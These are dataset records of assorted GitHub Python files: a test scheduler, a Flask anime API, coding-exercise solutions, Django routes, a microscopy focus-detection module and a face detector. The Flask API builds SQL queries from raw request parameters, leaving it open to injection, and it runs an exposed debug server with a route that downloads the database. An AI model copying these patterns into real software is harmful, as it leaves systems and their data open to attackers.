report(self, report):\n logger.info('acking schedule %s', report.schedule_id)\n await self.client.send(MessageType.Ack, {'schedule_id': report.schedule_id, 'status': 'success'})\n logger.info('submitting report with %s item(s)', len(report.items))\n await self.report_queue.put(report)\n\n async def stop(self):\n await self.report_queue.join()\n self.task.cancel()\n with suppress(asyncio.CancelledError):\n await self.task\n\n async def on_server_message(self, message_type, payload):\n if message_type == MessageType.Config.value:\n config_data = self.serializer.serialize_config(self.settings, self.worker_id)\n logger.info('generated config: %s', config_data)\n await self.client.send(MessageType.Config, config_data)\n elif message_type == MessageType.Suite.value:\n suite_data = self.serializer.serialize_suite(self.suite_items)\n logger.info('initialising suite with %s item(s)', len(self.suite_items))\n await self.client.send(MessageType.Suite, suite_data)\n elif message_type == MessageType.Schedules.value:\n for schedule_data in payload:\n schedule = self.serializer.deserialize_schedule(schedule_data)\n logger.info('received schedule with %s item(s)', len(schedule.items))\n await self.schedule_queue.put(schedule)\n elif message_type == MessageType.Done.value:\n self.more = False\n await self.schedule_queue.put(None) # so we unblock 'next'\n elif message_type == MessageType.Error.value:\n system_exit(payload['title'], payload['body'], payload['meta'])\n\n async def _report_task(self):\n logger.info('initialising report task')\n while True:\n try:\n report = await self.report_queue.get()\n logger.info('sending %s completed item(s)', len(report.items))\n report_data = self.serializer.serialize_report(report)\n await self.client.send(MessageType.Report, report_data)\n self.report_queue.task_done()\n except asyncio.CancelledError:\n break\n\n @property\n def done(self):\n return self.schedule_queue.empty and not self.more\n","repo_name":"bungeebyte/pytest-conquer","sub_path":"testandconquer/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3058882801","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, render_template, jsonify, request, send_file\nfrom markupsafe import escape\nimport json\nimport requests\nimport mysql.connector\nimport random as rd\n\napp = Flask(\n __name__,\n static_url_path='',\n static_folder='static',\n template_folder='templates'\n)\n\n\nmydb = mysql.connector.connect(\n host=\"YOUR-HOST\",\n user=\"YOUR-USER\",\n passwd=\"YOUR-PASWORD\",\n database=\"YOUR-DATABASE\"\n)\n\n\ndef animeRequestSQLAll(id):\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n\tAnime.nom_anime,\n\tAnime.url_img_anime,\n\tAnime.nbepisode_anime,\n\tAnime.vue_anime,\n\tAnime.desc_anime,\n\tFormat.nom_format,\n\tStatue.state_statue,\n alternative_titles_en_anime,\n alternative_titles_ja_anime,\n alternative_titles_synonyms_anime\n FROM \n\tAnime, \n\tFormat,\n\tStatue\n WHERE \n\tAnime.format_id_format = Format.id_format and\n\tAnime.statue_id_statue = Statue.id_statue and \n Anime.id_anime = {id}\n \"\"\")\n return mycursor.fetchall()\n\n\ndef animeRequestSQL(offset, limit):\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n Anime.nom_anime,\n Anime.url_img_anime,\n\tAnime.nbepisode_anime,\n Anime.vue_anime,\n Anime.desc_anime, \n Format.nom_format \n FROM \n\tAnime, \n Format \n WHERE \n\t Anime.format_id_format = Format.id_format\n ORDER BY \n\t Anime.id_anime\n LIMIT {limit} \n OFFSET {offset};\n \"\"\")\n return mycursor.fetchall()\n\n\ndef animeRequestSQLSearch():\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n Anime.nom_anime,\n Anime.url_img_anime,\n\tAnime.nbepisode_anime,\n Anime.vue_anime,\n Anime.desc_anime, \n Format.nom_format \n FROM \n\tAnime, \n Format \n WHERE \n\t Anime.format_id_format = Format.id_format\n ORDER BY \n\t Anime.id_anime;\n \"\"\")\n return mycursor.fetchall()\n\n\ndef DataFormat(v):\n return {\"id\": v[0], \"name\": v[1], \"img\": v[2],\n \"nbep\": v[3], \"vue\": v[4], \"desc\": v[5], \"type\": v[6]}\n\n\ndef DataFormatDetail(v):\n return {\"id\": v[0], \"name\": v[1], \"img\": v[2],\n \"nbep\": v[3], \"vue\": v[4], \"desc\": v[5], \"type\": v[6], \"statue\": v[7], \"en\": v[8], \"ja\": [9], \"syn\": v[10].split(\";\")}\n\n\n@app.route('/api/anime', methods=['GET'])\ndef anime():\n id = request.args.get('id', default=rd.randint(0, 42000))\n try:\n id = int(id)\n data = animeRequestSQLAll(id)[0]\n data = DataFormatDetail(data)\n except:\n data = None\n\n return jsonify({'status': '200', 'animes': data})\n\n\n@app.route('/api/page', methods=['GET'])\ndef page():\n offset = request.args.get('offset', default=0)\n limit = request.args.get('limit', default=1)\n data = animeRequestSQL(offset, limit)\n for k, v in enumerate(data):\n data[k] = DataFormat(v)\n return jsonify({'status': '200', 'animes': data})\n\n\n@app.route('/api/search', methods=['GET'])\ndef search():\n title = request.args.get('title', default=None)\n if title != None:\n title = title.lower().split(' ')\n TMPdata = animeRequestSQLSearch()\n else:\n TMPdata = animeRequestSQL(rd.randint(0, 40000), 10)\n data = []\n for k, v in enumerate(TMPdata):\n continuer = True\n if title != None:\n for i in title:\n if i in v[1].lower():\n pass\n else:\n continuer = False\n if continuer:\n data.append(DataFormat(v))\n return jsonify({'status': '200', 'search': title, 'animes': data})\n\n\n@app.route('/return-files/')\ndef return_files_tut():\n try:\n return send_file('./data.db', attachment_filename='data.db')\n except Exception as e:\n return str(e)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"MaximCosta/API_Anime","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"91011180","text":"class Solution:\n def productExcludeItself(self,nums):\n answer = []\n _len = len(nums)\n prod = 1\n for i in range(_len):\n answer.append(prod)\n prod *= nums[i]\n prod = 1\n for i in range(_len - 1, -1, -1):\n answer[i] *= prod\n prod *= nums[i]\n return answer\n","repo_name":"marcus-aurelianus/Lintcode-with-Python","sub_path":"50. Product of Array Exclude Itself/sol50-fastest.py","file_name":"sol50-fastest.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"71766073659","text":"from ticket import Ticket\n\nclass Kassa:\n balance = 0\n tickets = []\n registered_source = []\n registered_destination = []\n registered_train = []\n trains = []\n\n def register_train(self, source, destination=None):\n self.registered_source = [source]\n self.registered_destination = [destination]\n self.registered_train += zip(self.registered_source, self.registered_destination)\n return self.registered_train\n\n def get_price(self, source, destination):\n return (len(source) + len(destination)) * 1000\n\n def buy_ticket(self, source, destination, person):\n for i in self.registered_train:\n if i[0] == source and i[1] == destination:\n price = self.get_price(source, destination)\n money = person.pay(price)\n if money:\n self.balance += money\n new_ticket = Ticket(source, destination, person.name, person.iin, person.age)\n self.tickets.append(new_ticket)\n print(\"Номер вашего билета -\", new_ticket.number)\n else:\n print(\"No money - no ticket!\")\n else:\n print(\"У нас нет такого поезда!\")\n break\n\n def get_ticket(self, iin, source, destination):\n for x in self.tickets:\n if x.source == source and x.destination == destination and x.passenger_iin == iin:\n return x\n\n def delete_ticket(self, ticket):\n self.tickets.remove(ticket)\n\n\nprint(\"Это касса!\", __name__)","repo_name":"yngkzk/python_homework","sub_path":"June 20/kassa.py","file_name":"kassa.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"19744958097","text":"\"\"\"soon_food_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('food/', views.food),\n path('df_btn/', views.df_btn_click),\n path('food/df_btn/', views.df_btn_click),\n path('random_choice/', views.random_cate),\n path('search_food/', views.search_food_btn),\n path('random_choice/select_detail/', views.detail_content),\n path('random_choice/select_detail/select_detail/', views.detail_content),\n path('search_food/select_detail/', views.detail_content),\n path('food/menu/', views.menu_lst),\n path('food/check_food/', views.check_food),\n path('random_choice/menu/', views.menu_lst),\n path('random_choice/select_detail/menu/', views.menu_lst),\n path('food/select_detail/', views.detail_content),\n path('search_food/menu/', views.menu_lst),\n # path('random_choice/select_food/', views.select_food),\n # path('random_choice/select_food_btn/', views.select_food),\n # path('/select_food_btn/', views.select_food),\n # path('random_choice/select_food_btn/chk_food/', views.final_check),\n # path('random_choice/select_food_btn/', views.final_check),\n # path('random_choice/select_food/', views.final_check),\n\n\n\n\n # path('random_choice/detail_contents1/', views.detail_content),\n # path('random_choice/check_food/', views.detail_content),\n # path('random_choice/detail_contents3/', views.detail_content)\n]\n","repo_name":"Shin-HyunSeung/soon_project","sub_path":"soon_food_project/soonfood_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"38616510699","text":"class Solution:\n \n def isComplete(self, row: int, coins: int) -> bool:\n \n needed_coins = (row * (row+1))//2\n return needed_coins <= coins\n \n \n # O(logn) time,\n # O(1) space,\n # Approach: binary search, math, \n def arrangeCoins(self, n: int) -> int:\n low, hi = 0, n\n ans = 0\n \n while low <= hi:\n mid = (low+hi)//2\n if self.isComplete(mid, n):\n ans = mid\n low = mid+1\n else:\n hi = mid-1\n \n return ans","repo_name":"destifo/Competitive-Programming","sub_path":"441. Arranging Coins/ArrangeCoins.py","file_name":"ArrangeCoins.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"15915350361","text":"import csv\nimport glob\nimport os\nimport time\n\n# from IPython.display import clear_output\nfrom pathlib import Path\n\n# from qtpy.QtCore import Qt\n# from qtpy.QtWidgets import QComboBox, QPushButton, QSlider\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.optimize import curve_fit\nfrom tifffile import imread, imwrite\nfrom tqdm import tqdm\n\nfrom oneat.NEATModels.neat_focus import NEATFocus\nfrom oneat.NEATModels.nets import Concat\nfrom oneat.NEATUtils.utils import (\n focyoloprediction,\n normalizeFloatZeroOne,\n simpleaveragenms,\n)\n\n# from napari.qt.threading import thread_worker\n# from matplotlib.backends.backend_qt5agg import \\\n# FigureCanvasQTAgg as FigureCanvas\nBoxname = \"ImageIDBox\"\nEventBoxname = \"EventIDBox\"\n\n\nclass NEATFocusPredict(NEATFocus):\n def __init__(self, config, model_dir, catconfig, cordconfig):\n\n super().__init__(\n config=config,\n model_dir=model_dir,\n catconfig=catconfig,\n cordconfig=cordconfig,\n )\n\n def predict(\n self,\n imagedir: str,\n Z_imagedir: str,\n Z_movie_name_list: list,\n Z_movie_input: list,\n start: int,\n fileextension: str = \"*TIF\",\n nb_prediction: int = 3,\n Z_n_tiles: tuple = (1, 2, 2),\n overlap_percent: float = 0.6,\n normalize: bool = True,\n ):\n\n self.imagedir = imagedir\n self.basedirResults = self.imagedir + \"/\" + \"live_results\"\n Path(self.basedirResults).mkdir(exist_ok=True)\n # Recurrsion variables\n self.Z_movie_name_list = Z_movie_name_list\n self.Z_movie_input = Z_movie_input\n self.Z_imagedir = Z_imagedir\n self.start = start\n self.nb_prediction = nb_prediction\n self.fileextension = fileextension\n self.Z_n_tiles = Z_n_tiles\n self.overlap_percent = overlap_percent\n self.normalize = normalize\n\n self.model = self._build()\n\n # Z slice folder listener\n while 1:\n\n Z_Raw_path = os.path.join(self.Z_imagedir, self.fileextension)\n Z_filesRaw = glob.glob(Z_Raw_path)\n\n for Z_movie_name in Z_filesRaw:\n Z_Name = os.path.basename(os.path.splitext(Z_movie_name)[0])\n # Check for unique filename\n if Z_Name not in self.Z_movie_name_list:\n self.Z_movie_name_list.append(Z_Name)\n self.Z_movie_input.append(Z_movie_name)\n\n if Z_Name in self.Z_movie_name_list:\n self.Z_movie_name_list.remove(Z_Name)\n if Z_movie_name in self.Z_movie_input:\n self.Z_movie_input.remove(Z_movie_name)\n\n self.Z_movie_input_list = []\n for (k, v) in self.Z_movie_input.items():\n self.Z_movie_input_list.append(v)\n total_movies = len(self.Z_movie_input_list)\n\n if total_movies > self.start:\n current_movies = imread(\n self.Z_movie_input_list[self.start : self.start + 1]\n )\n\n current_movies_down = current_movies\n # print(current_movies_down.shape)\n print(\n \"Predicting on Movie:\",\n self.Z_movie_input_list[self.start : self.start + 1],\n )\n\n eventboxes = []\n classedboxes = {}\n self.image = current_movies_down\n if self.normalize:\n self.image = normalizeFloatZeroOne(self.image, 1, 99.8)\n # Break image into tiles if neccessary\n\n print(\"Doing ONEAT prediction\")\n start_time = time.time()\n # Iterate over tiles\n\n for inputz in tqdm(range(0, self.image.shape[0])):\n if inputz <= self.image.shape[0] - self.imagez:\n\n eventboxes = []\n classedboxes = {}\n smallimage = CreateVolume(\n self.image, self.imagez, inputz\n )\n predictions, allx, ally = self.predict_main(smallimage)\n for p in range(0, len(predictions)):\n\n sum_z_prediction = predictions[p]\n\n if sum_z_prediction is not None:\n # For each tile the prediction vector has shape N H W Categories + Training Vector labels\n for i in range(0, sum_z_prediction.shape[0]):\n z_prediction = sum_z_prediction[i]\n boxprediction = focyoloprediction(\n ally[p],\n allx[p],\n z_prediction,\n self.stride,\n inputz,\n self.config,\n self.key_categories,\n )\n\n if boxprediction is not None:\n eventboxes = eventboxes + boxprediction\n\n for (\n event_name,\n event_label,\n ) in self.key_categories.items():\n\n if event_label > 0:\n current_event_box = []\n for box in eventboxes:\n\n event_prob = box[event_name]\n if event_prob > 0:\n current_event_box.append(box)\n classedboxes[event_name] = [current_event_box]\n\n self.classedboxes = classedboxes\n self.eventboxes = eventboxes\n\n self.nms()\n self.to_csv()\n self.draw()\n\n print(\n \"____ Prediction took %s seconds ____ \",\n (time.time() - start_time),\n )\n self.print_planes()\n self.genmap()\n self.start = self.start + 1\n self.predict(\n self.imagedir,\n self.Z_imagedir,\n self.Z_movie_name_list,\n self.Z_movie_input,\n fileextension=self.fileextension,\n nb_prediction=self.nb_prediction,\n Z_n_tiles=self.Z_n_tiles,\n overlap_percent=self.overlap_percent,\n )\n\n def _build(self):\n\n Model = load_model(\n self.model_dir,\n custom_objects={\"loss\": self.yolo_loss, \"Concat\": Concat},\n )\n return Model\n\n def nms(self):\n\n best_iou_classedboxes = {}\n all_best_iou_classedboxes = {}\n self.all_iou_classedboxes = {}\n self.iou_classedboxes = {}\n for (event_name, event_label) in self.key_categories.items():\n if event_label > 0:\n # Get all events\n\n sorted_event_box = self.classedboxes[event_name][0]\n\n sorted_event_box = sorted(\n sorted_event_box, key=lambda x: x[event_name], reverse=True\n )\n\n scores = [\n sorted_event_box[i][event_name]\n for i in range(len(sorted_event_box))\n ]\n best_sorted_event_box, all_boxes = simpleaveragenms(\n sorted_event_box,\n scores,\n self.iou_threshold,\n self.event_threshold,\n event_name,\n )\n\n all_best_iou_classedboxes[event_name] = [all_boxes]\n best_iou_classedboxes[event_name] = [best_sorted_event_box]\n self.iou_classedboxes = best_iou_classedboxes\n self.all_iou_classedboxes = all_best_iou_classedboxes\n\n def genmap(self):\n\n image = imread(self.savename)\n Name = os.path.basename(os.path.splitext(self.savename)[0])\n Signal_first = image[:, :, :, 1]\n Signal_second = image[:, :, :, 2]\n Sum_signal_first = gaussian_filter(\n np.sum(Signal_first, axis=0), self.radius\n )\n Sum_signal_first = normalizeZeroOne(Sum_signal_first)\n Sum_signal_second = gaussian_filter(\n np.sum(Signal_second, axis=0), self.radius\n )\n\n Sum_signal_second = normalizeZeroOne(Sum_signal_second)\n\n Zmap = np.zeros(\n [Sum_signal_first.shape[0], Sum_signal_first.shape[1], 3]\n )\n Zmap[:, :, 0] = Sum_signal_first\n Zmap[:, :, 1] = Sum_signal_second\n Zmap[:, :, 2] = (Sum_signal_first + Sum_signal_second) / 2\n\n imwrite(self.basedirResults + Name + \"_Zmap\" + \".tif\", Zmap)\n\n def to_csv(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n zlocations = []\n scores = []\n max_scores = []\n iou_current_event_box = self.iou_classedboxes[event_name][0]\n zcenter = iou_current_event_box[\"real_z_event\"]\n max_score = iou_current_event_box[\"max_score\"]\n score = iou_current_event_box[event_name]\n\n zlocations.append(zcenter)\n scores.append(score)\n max_scores.append(max_score)\n print(zlocations, scores)\n event_count = np.column_stack([zlocations, scores, max_scores])\n event_count = sorted(\n event_count, key=lambda x: x[0], reverse=False\n )\n event_data = []\n csvname = (\n self.basedirResults + \"/\" + event_name + \"_FocusQuality\"\n )\n writer = csv.writer(open(csvname + \".csv\", \"a\"))\n filesize = os.stat(csvname + \".csv\").st_size\n if filesize < 1:\n writer.writerow([\"Z\", \"Score\", \"Max_score\"])\n for line in event_count:\n if line not in event_data:\n event_data.append(line)\n writer.writerows(event_data)\n event_data = []\n\n def fit_curve(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n readcsvname = (\n self.basedirResults + \"/\" + event_name + \"_FocusQuality\"\n )\n self.dataset = pd.read_csv(readcsvname, delimiter=\",\")\n self.dataset_index = self.dataset.index\n\n Z = self.dataset[self.dataset.keys()[0]][1:]\n score = self.dataset[self.dataset.keys()[1]][1:]\n\n H, A, mu0, sigma = gauss_fit(np.array(Z), np.array(score))\n csvname = (\n self.basedirResults\n + \"/\"\n + event_name\n + \"_GaussFitFocusQuality\"\n )\n writer = csv.writer(open(csvname + \".csv\", \"a\"))\n filesize = os.stat(csvname + \".csv\").st_size\n if filesize < 1:\n writer.writerow([\"Amplitude\", \"Mean\", \"Sigma\"])\n writer.writerow([A, mu0, sigma])\n\n csvname = self.basedirResults + \"/\" + event_name\n\n def print_planes(self):\n for (event_name, event_label) in self.key_categories.items():\n if event_label > 0:\n csvfname = (\n self.basedirResults\n + \"/\"\n + event_name\n + \"_focus_quality\"\n + \".csv\"\n )\n dataset = pd.read_csv(csvfname, skiprows=0)\n z = dataset[dataset.keys()[0]][1:]\n score = dataset[dataset.keys()[1]][1:]\n maxz = z[np.argmax(score)] + 2\n print(\"Best Zs\" + \"for\" + event_name + \"at\" + str(maxz))\n\n def draw(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n\n xlocations = []\n ylocations = []\n scores = []\n zlocations = []\n heights = []\n widths = []\n iou_current_event_boxes = self.all_iou_classedboxes[\n event_name\n ][0]\n\n for iou_current_event_box in iou_current_event_boxes:\n\n xcenter = iou_current_event_box[\"xcenter\"]\n ycenter = iou_current_event_box[\"ycenter\"]\n zcenter = iou_current_event_box[\"real_z_event\"]\n xstart = iou_current_event_box[\"xstart\"]\n ystart = iou_current_event_box[\"ystart\"]\n xend = xstart + iou_current_event_box[\"width\"]\n yend = ystart + iou_current_event_box[\"height\"]\n score = iou_current_event_box[event_name]\n\n if event_label == 1:\n for x in range(int(xstart), int(xend)):\n for y in range(int(ystart), int(yend)):\n if (\n y < self.image.shape[1]\n and x < self.image.shape[2]\n ):\n self.Maskimage[int(zcenter), y, x, 1] = (\n self.Maskimage[int(zcenter), y, x, 1]\n + score\n )\n else:\n\n for x in range(int(xstart), int(xend)):\n for y in range(int(ystart), int(yend)):\n if (\n y < self.image.shape[1]\n and x < self.image.shape[2]\n ):\n self.Maskimage[int(zcenter), y, x, 2] = (\n self.Maskimage[int(zcenter), y, x, 2]\n + score\n )\n\n if score > 0.9:\n\n xlocations.append(round(xcenter))\n ylocations.append(round(ycenter))\n scores.append(score)\n zlocations.append(zcenter)\n heights.append(iou_current_event_box[\"height\"])\n widths.append(iou_current_event_box[\"width\"])\n\n def overlaptiles(self, sliceregion):\n\n if self.n_tiles == (1, 1):\n patch = []\n rowout = []\n column = []\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n patchshape = (patchy, patchx)\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, [0, 0]\n )\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n\n else:\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n\n if patchx > self.imagex and patchy > self.imagey:\n if self.overlap_percent > 1 or self.overlap_percent < 0:\n self.overlap_percent = 0.8\n\n jumpx = int(self.overlap_percent * patchx)\n jumpy = int(self.overlap_percent * patchy)\n\n patchshape = (patchy, patchx)\n rowstart = 0\n colstart = 0\n pairs = []\n # row is y, col is x\n\n while rowstart < sliceregion.shape[1] - patchy:\n colstart = 0\n while colstart < sliceregion.shape[2] - patchx:\n\n # Start iterating over the tile with jumps = stride of the fully convolutional network.\n pairs.append([rowstart, colstart])\n colstart += jumpx\n rowstart += jumpy\n\n # Include the last patch\n rowstart = sliceregion.shape[1] - patchy\n colstart = 0\n while colstart < sliceregion.shape[2]:\n pairs.append([rowstart, colstart])\n colstart += jumpx\n rowstart = 0\n colstart = sliceregion.shape[2] - patchx\n while rowstart < sliceregion.shape[1]:\n pairs.append([rowstart, colstart])\n rowstart += jumpy\n\n if (\n sliceregion.shape[1] >= self.imagey\n and sliceregion.shape[2] >= self.imagex\n ):\n\n patch = []\n rowout = []\n column = []\n for pair in pairs:\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, pair\n )\n if (\n smallpatch.shape[1] >= self.imagey\n and smallpatch.shape[2] >= self.imagex\n ):\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n\n else:\n\n patch = []\n rowout = []\n column = []\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n patchshape = (patchy, patchx)\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, [0, 0]\n )\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n self.patch = patch\n self.sy = rowout\n self.sx = column\n\n def predict_main(self, sliceregion):\n try:\n self.overlaptiles(sliceregion)\n predictions = []\n allx = []\n ally = []\n if len(self.patch) > 0:\n for i in range(0, len(self.patch)):\n\n sum_time_prediction = self.make_patches(self.patch[i])\n predictions.append(sum_time_prediction)\n allx.append(self.sx[i])\n ally.append(self.sy[i])\n\n else:\n\n sum_time_prediction = self.make_patches(self.patch)\n predictions.append(sum_time_prediction)\n allx.append(self.sx)\n ally.append(self.sy)\n\n except tf.errors.ResourceExhaustedError:\n\n print(\"Out of memory, increasing overlapping tiles for prediction\")\n\n self.list_n_tiles = list(self.n_tiles)\n self.list_n_tiles[0] = self.n_tiles[0] + 1\n self.list_n_tiles[1] = self.n_tiles[1] + 1\n self.n_tiles = tuple(self.list_n_tiles)\n\n self.predict_main(sliceregion)\n\n return predictions, allx, ally\n\n def make_patches(self, sliceregion):\n\n predict_im = np.expand_dims(sliceregion, 0)\n\n prediction_vector = self.model.predict(\n np.expand_dims(predict_im, -1), verbose=0\n )\n\n return prediction_vector\n\n def make_batch_patches(self, sliceregion):\n\n prediction_vector = self.model.predict(\n np.expand_dims(sliceregion, -1), verbose=0\n )\n return prediction_vector\n\n\ndef chunk_list(image, patchshape, stride, pair):\n rowstart = pair[0]\n colstart = pair[1]\n\n endrow = rowstart + patchshape[0]\n endcol = colstart + patchshape[1]\n\n if endrow > image.shape[1]:\n endrow = image.shape[1]\n if endcol > image.shape[2]:\n endcol = image.shape[2]\n\n region = (\n slice(0, image.shape[0]),\n slice(rowstart, endrow),\n slice(colstart, endcol),\n )\n\n # The actual pixels in that region.\n patch = image[region]\n\n # Always normalize patch that goes into the netowrk for getting a prediction score\n\n return patch, rowstart, colstart\n\n\ndef CreateVolume(patch, imagez, timepoint):\n\n starttime = timepoint\n endtime = timepoint + imagez\n smallimg = patch[starttime:endtime, :]\n\n return smallimg\n\n\ndef normalizeZeroOne(x):\n x = x.astype(\"float32\")\n\n minVal = np.min(x)\n maxVal = np.max(x)\n\n x = (x - minVal) / (maxVal - minVal + 1.0e-20)\n\n return x\n\n\ndef gauss(x, H, A, x0, sigma):\n return H + A * np.exp(-((x - x0) ** 2) / (2 * sigma**2))\n\n\ndef gauss_fit(x, y):\n\n mean = sum(x * y) / sum(y)\n sigma = np.sqrt(sum(y * (x - mean) ** 2) / sum(y))\n popt, pcov = curve_fit(gauss, x, y, p0=[min(y), max(y), mean, sigma])\n return popt\n","repo_name":"Kapoorlabs-CAPED/caped-ai-oneat","sub_path":"src/oneat/NEATModels/neat_focus_microscope.py","file_name":"neat_focus_microscope.py","file_ext":"py","file_size_in_byte":21313,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"23"} +{"seq_id":"23779175313","text":"\n\nfrom keras.models import load_model\nimport numpy as np\nimport sys\nimport cv2\nimport os\nfrom keras import backend as K\nimport time\nfrom FaceChecker.FaceDetector.boundingbox import interpret_output_yolov2, crop\nfrom FaceChecker.FaceDetector.config import IMAGE_SIZE_THESHOLD\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n\nclass FaceDetector:\n \n def __init__(self, model_path):\n self.detector = load_model(model_path)\n \n \"\"\"\n def detect_faces(self,frame):\n \n t = time.time()\n\n frame_resized = cv2.resize(frame, (416,416))/255.0\n \n frame_resized = np.expand_dims(frame_resized, axis=0)\n \n predict = self.detector.predict(frame_resized)[0]\n \n results = interpret_output_yolov2(predict, np.shape(frame)[1], np.shape(frame)[0])\n \n list_faces = []\n \n for i in range(len(results)):\n \n if results[i][5] >= 0.5 and results[i][0] == 'face':\n \n \n #display detected face\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])//2\n h = int(results[i][4])//2\n \n xmin, xmax, ymin, ymax = crop(\n x, y, w, h, 1.4, np.shape(frame)[1], np.shape(frame)[0])\n \n print(str(i)+'-- '+str(xmin)+'-'+str(xmax)+'-'+str(ymin)+'-'+str(ymax))\n \n \n list_faces.append(frame[ymin:ymax, xmin:xmax])\n\n print('detect face time:{0:.4f}'.format(time.time()-t))\n\n return list_faces\n \n \"\"\"\n \n def detect_faces(self,frame):\n print(np.shape(frame))\n t = time.time()\n\n frame_resized = cv2.resize(frame, (416,416))/255.0\n\n frame_resized = np.expand_dims(frame_resized, axis=0)\n\n print(np.shape(frame_resized))\n\n predict = self.detector.predict(frame_resized)[0]\n\n results = interpret_output_yolov2(predict, np.shape(frame)[1], np.shape(frame)[0])\n\n list_faces = []\n\n print(len(results))\n\n for i in range(len(results)):\n\n if results[i][5] >= 0.7 and results[i][0] == 'face':\n \n info = {}\n\n #display detected face\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])//2\n h = int(results[i][4])//2\n\n xmin, xmax, ymin, ymax = crop(\n x, y, w, h, 1.4, np.shape(frame)[1], np.shape(frame)[0])\n\n print(str(i)+'-- '+str(xmin)+'-'+str(xmax)+'-'+str(ymin)+'-'+str(ymax) )\n \n info['coordinates'] = [x,y,w,h]\n \n info['padding_face'] = frame[ymin:ymax, xmin:xmax]\n \n list_faces.append(info)\n\n print('detect face time:{0:.4f}'.format(time.time()-t))\n\n return list_faces\n \n def check_faces(self,list_faces):\n\n checked_faces = [face for face in list_faces if face['padding_face'].shape[0] >=IMAGE_SIZE_THESHOLD and face['padding_face'].shape[1] >=IMAGE_SIZE_THESHOLD]\n \n return checked_faces\n \n def test_on_video(self,video_path):\n \n cap = cv2.VideoCapture(video_path)\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (int(cap.get(3)), int(cap.get(4))))\n \n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n \n list_faces = self.detect_faces(frame)\n \n result = self.check_faces(list_faces)\n \n if len(result) > 0:\n \n for info in result:\n x,y,w,h = info['coordinates']\n cv2.rectangle(frame,(x-w,y-h),(x+w,y+h),(0,0,255),4)\n out.write(frame)\n else:\n out.write(frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n \n \n \n\nif __name__=='__main__':\n \n face_detector = FaceDetector(model_path='/content/module2/FaceDetector/pretrain/yolov2_tiny-face.h5')\n \n video_path = '/content/module2/video.mp4'\n \n face_detector.test_on_video(video_path)\n \n\n \n ","repo_name":"dqhuy140598/PyFace","sub_path":"FaceChecker/FaceDetector/FaceDetector.py","file_name":"FaceDetector.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"2093880276","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\n\n# ==============================================================================\n# Computational Values\nITERATIONS = 2000\nEPS = 1e-5\n\n# ==============================================================================\n# Physical Values\n\nG = 3.0\nrho_s = 2500\nrho_f = 1000\nK_fl = 8.0\nK_sg = 10.0\nK_d = 4.0\nalpha = 0.6\nphi = 0.1\nk = 1.5\nmu_f = 1.0\nF = 1.0\nndim = 2\n\nzmax = 1.0\nzmin = 0.0\nymax = 1.0\nymin = 0.0\nxmax = 10.0\nxmin = 